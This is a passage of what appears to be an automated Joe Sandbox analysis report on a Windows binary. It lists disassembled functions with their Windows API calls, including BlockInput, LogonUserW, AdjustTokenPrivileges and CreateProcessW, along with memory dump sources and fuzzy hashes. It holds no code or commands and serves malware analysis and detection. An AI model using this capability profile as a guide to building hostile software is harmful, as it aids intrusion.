                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClientDialogNtdllProc_Screen
                    • String ID:
                    • API String ID: 3420055661-0
                    • Opcode ID: 1cdd3b2489fbfca3e17e997dd48919b929b92a9b6b0737ffb41cbc29500df196
                    • Instruction ID: a66b3847eea935efdcb2a013001b00ed26cfade9f1067bdbc800cfaa1598633f
                    • Opcode Fuzzy Hash: 1cdd3b2489fbfca3e17e997dd48919b929b92a9b6b0737ffb41cbc29500df196
                    • Instruction Fuzzy Hash: DCF0177240021CBFEB048F85DD49ABE7BB9EF48311F00416AF905A2261D771AA61EBA5
                    Function 00CDA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CE977D,?,00CFFB84,?), ref: 00CDA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CE977D,?,00CFFB84,?), ref: 00CDA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 940d260cc7504c1a17b450933a0fc96e362af15c3da567e85f8f8a883a406c65
                    • Instruction ID: 8b67260c866924cfebb5909c94c9d7373e5f74e5e4b6304f0573148dbd9bb9d7
                    • Opcode Fuzzy Hash: 940d260cc7504c1a17b450933a0fc96e362af15c3da567e85f8f8a883a406c65
                    • Instruction Fuzzy Hash: 9DF0823554422DABDB109FA4CC48FEA776DFF09761F00826AF918D6291D6309944CBA1
                    Function 00CFCD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongW.USER32(?,000000EC), ref: 00CFCD74
                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00CABBE5,?,?,?,?), ref: 00CFCDA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 17d22356339303ba193ad5ded20a3eca26954802daa5447d122f5e1eb850437a
                    • Instruction ID: b92093600930380e27d2a6680b1daacc67e23281990c1aea35a7adc722d2a179
                    • Opcode Fuzzy Hash: 17d22356339303ba193ad5ded20a3eca26954802daa5447d122f5e1eb850437a
                    • Instruction Fuzzy Hash: 92E0867020025CBFEB155F19DC49FBE3B54EB04750F408229F956D90E1C7719851D761
                    Function 00CC8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CC8851), ref: 00CC8728
                    • CloseHandle.KERNEL32(?,?,00CC8851), ref: 00CC873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: f6f2017af989a6ff5f91e10d2f6e0857077bc73f2bbe335f06af6d8c6faf88d1
                    • Instruction ID: af4b41845aa651a8f2dd94f64412bb212cb9adaca9a377be53d56d40dc58bf29
                    • Opcode Fuzzy Hash: f6f2017af989a6ff5f91e10d2f6e0857077bc73f2bbe335f06af6d8c6faf88d1
                    • Instruction Fuzzy Hash: 37E0BF76010511EEEB252B60EC09E7777A9EF04350724852DF96680470DB625C91DB10
                    Function 00C9A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00D04178,00C98F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00C9A39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C9A3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 7693899cfc56a4fead644170fdb5174bb8067217a9234dd88d6d92c3b23b006d
                    • Instruction ID: 447b3717e7e08a85bb69adea3252c68430350cf0fac61d0cc69c717112c08fd2
                    • Opcode Fuzzy Hash: 7693899cfc56a4fead644170fdb5174bb8067217a9234dd88d6d92c3b23b006d
                    • Instruction Fuzzy Hash: E0B09231054208ABCA102B91EC09BAC3F6AEF44AA2F404024F60D84070CB625456CA96
                    Function 00C9F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3806dc45f6a7a4c6e67d1878b2fe40755c4d78760a5b6a30568834bcd7016818
                    • Instruction ID: 300a8df81ba2254048acc8d0598a09dc2c42406178e21f6ce02aef11638133ec
                    • Opcode Fuzzy Hash: 3806dc45f6a7a4c6e67d1878b2fe40755c4d78760a5b6a30568834bcd7016818
                    • Instruction Fuzzy Hash: BA321422D69F414DDB239634D836336A249AFB73C4F15D73BE829F5AA6EB28D5834100
                    Function 00CA267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c978ddc5e07b9c8792ab93bcdb9efdad53b1a9c9039ced869ba208912bdbad5
                    • Instruction ID: a9ec06c2b3bc5f415455adc62b7cab97f2cb423a80ac382b691c71f9a7184856
                    • Opcode Fuzzy Hash: 7c978ddc5e07b9c8792ab93bcdb9efdad53b1a9c9039ced869ba208912bdbad5
                    • Instruction Fuzzy Hash: 6BB1F021D2AF514DD32396398831336BB5CAFBB2D9F51D71BFC2AB4E62EB2185834141
                    Function 00CD8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 00CD8B25
                      • Part of subcall function 00C9543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CD91F8,00000000,?,?,?,?,00CD93A9,00000000,?), ref: 00C95443
                      • Part of subcall function 00C9543A: __aulldiv.LIBCMT ref: 00C95463
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: a5273bb2ada33654a47047a2f79959e6194d864db1a4167c54346db9b2528cd3
                    • Instruction ID: 885c75521535f2be89982232f63b3793502d84e86006d8e2bb37e560da2d568b
                    • Opcode Fuzzy Hash: a5273bb2ada33654a47047a2f79959e6194d864db1a4167c54346db9b2528cd3
                    • Instruction Fuzzy Hash: F421E472635A108BC729CF29D841B52B3E1EBA4311B288E6DD1F5CB3D0CA34B905DB94
                    Function 00CFDA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00CFDB46
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 4dd765c8e27e3476fcc6b1abde4a33c54d5548cf97e46fb8d5039eeadcf9925c
                    • Instruction ID: 8d24f7cb6e3bd79f3651372ad3b0d837ddb901dd3fcac38e967fbf87ddf7e0d3
                    • Opcode Fuzzy Hash: 4dd765c8e27e3476fcc6b1abde4a33c54d5548cf97e46fb8d5039eeadcf9925c
                    • Instruction Fuzzy Hash: AF11EB7520411DBBEB655E1DCC05F7A3716E745B20F208215FB639B5E2CA609E00A267
                    Function 00CFD6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00CABBA2,?,?,?,?,00000000,?), ref: 00CFD740
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: ac2f14f0eca3ade08e5da242b6505a450e1769d1e84a016e7b9885e781860da3
                    • Instruction ID: a336a314138bc8c42c3daf7680caae75557eded1b0533a3c3c92aa9772a089d7
                    • Opcode Fuzzy Hash: ac2f14f0eca3ade08e5da242b6505a450e1769d1e84a016e7b9885e781860da3
                    • Instruction Fuzzy Hash: 9A01F53560011CABDB14AF29C889ABA3B93EF45325F044126FA275F191C331AD61D7A2
                    Function 00CFC220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C72344: GetCursorPos.USER32(?), ref: 00C72357
                      • Part of subcall function 00C72344: ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000001), ref: 00C72399
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00CABC4F,?,?,?,?,?,00000001,?), ref: 00CFC272
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                    • String ID:
                    • API String ID: 2356834413-0
                    • Opcode ID: 9369913a9af0398d7057230aa8713f09af27a7d69d26d2943b9ba50439503ec9
                    • Instruction ID: 97e7016ce5155ee4f7e1cb90b10acbc472247483c0669256935695210a7b2adc
                    • Opcode Fuzzy Hash: 9369913a9af0398d7057230aa8713f09af27a7d69d26d2943b9ba50439503ec9
                    • Instruction Fuzzy Hash: 57F0823020422CABDF04AF49CC45EBE3BA5EB04750F008015F9565B2A2CB75A960EBE1
                    Function 00C7189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00C71B04,?,?,?,?,?), ref: 00C718E2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: ec36c839f070bc2db6cd42cc076873ac49f841043aa962de1093b6ba39be299a
                    • Instruction ID: c4bfd3c050e02fb7475a81e9a702208e1424d99a1df3a77f5203ab610b083dce
                    • Opcode Fuzzy Hash: ec36c839f070bc2db6cd42cc076873ac49f841043aa962de1093b6ba39be299a
                    • Instruction Fuzzy Hash: 56F0BE70200218AFCB08DF09C850A3A37A2EB04350F40C529FC568B3E0CB31DD50EB60
                    Function 00CE41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • BlockInput.USER32(00000001), ref: 00CE4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: 0c896449e095c0896db43aaad5f005deb1af93ce8f3248778f64a65b648d7d57
                    • Instruction ID: 801aa26c6c6d3a51eca43adf2b5ce39e2fd868051a346d0ff743fdbaf9ba105f
                    • Opcode Fuzzy Hash: 0c896449e095c0896db43aaad5f005deb1af93ce8f3248778f64a65b648d7d57
                    • Instruction Fuzzy Hash: 75E04F322402149FC710EF5AD845B9AFBE8EF94760F00C02AFD4AC7352DA70E841DBA1
                    Function 00CFCBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00CFCBEE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 780a1aa212655781f32ee6b6b178a0ca947a1d81130113bb74b84dcd48ed73ee
                    • Instruction ID: 6e3b14e998971f073c068ad3d71d5524e10713f8c72c4817cd1402a0d1508011
                    • Opcode Fuzzy Hash: 780a1aa212655781f32ee6b6b178a0ca947a1d81130113bb74b84dcd48ed73ee
                    • Instruction Fuzzy Hash: 35F06D35240259BFDB21DF58DC45FD63B95EB09720F048058BA21672E1CBB0B920E7A1
                    Function 00CD4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CD4EEC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: b348f1e8176610d6e024f940c457c519d2d6aaa7f3a2e762f84d2b64d73d38d2
                    • Instruction ID: 7df6fa03d5b46e786ffabe587a646faf4ef55522be98f29a6b2288653224ef10
                    • Opcode Fuzzy Hash: b348f1e8176610d6e024f940c457c519d2d6aaa7f3a2e762f84d2b64d73d38d2
                    • Instruction Fuzzy Hash: A5D05E981606047BEC2C4B219C5FF778308F300781FD0425BB31299AC1D9F0AD51A031
                    Function 00CC8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CC88D1), ref: 00CC8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: eb28576ed7f757c4a858de24df770ace1d76d03317e9bb516ba139fa8c3724f1
                    • Instruction ID: c19a6996bfe70cac26b1377593020be58f4311c1dcb1379fdffdce59a1c4d679
                    • Opcode Fuzzy Hash: eb28576ed7f757c4a858de24df770ace1d76d03317e9bb516ba139fa8c3724f1
                    • Instruction Fuzzy Hash: 8BD05E3226050EABEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1C775D835EB60
                    Function 00CFCBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00CABC0C,?,?,?,?,?,?), ref: 00CFCC24
                      • Part of subcall function 00CFB8EF: _memset.LIBCMT ref: 00CFB8FE
                      • Part of subcall function 00CFB8EF: _memset.LIBCMT ref: 00CFB90D
                      • Part of subcall function 00CFB8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D37F20,00D37F64), ref: 00CFB93C
                      • Part of subcall function 00CFB8EF: CloseHandle.KERNEL32 ref: 00CFB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                    • String ID:
                    • API String ID: 2364484715-0
                    • Opcode ID: a11aadc239a6b60ad5ff9787e31d3f5977ac16c4b975b04900d431688c987236
                    • Instruction ID: c5334aa379b0335c5869e61c31d54e6b9ff9403bde2682e74529aa55e26bd965
                    • Opcode Fuzzy Hash: a11aadc239a6b60ad5ff9787e31d3f5977ac16c4b975b04900d431688c987236
                    • Instruction Fuzzy Hash: F6E0923520020CEFCB41AF45DE85EA937A5FB1C355F018055FA155B2B2CB31A960EF52
                    Function 00C7167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00C71AEE,?,?,?), ref: 00C716AB
                    Memory Dump Source
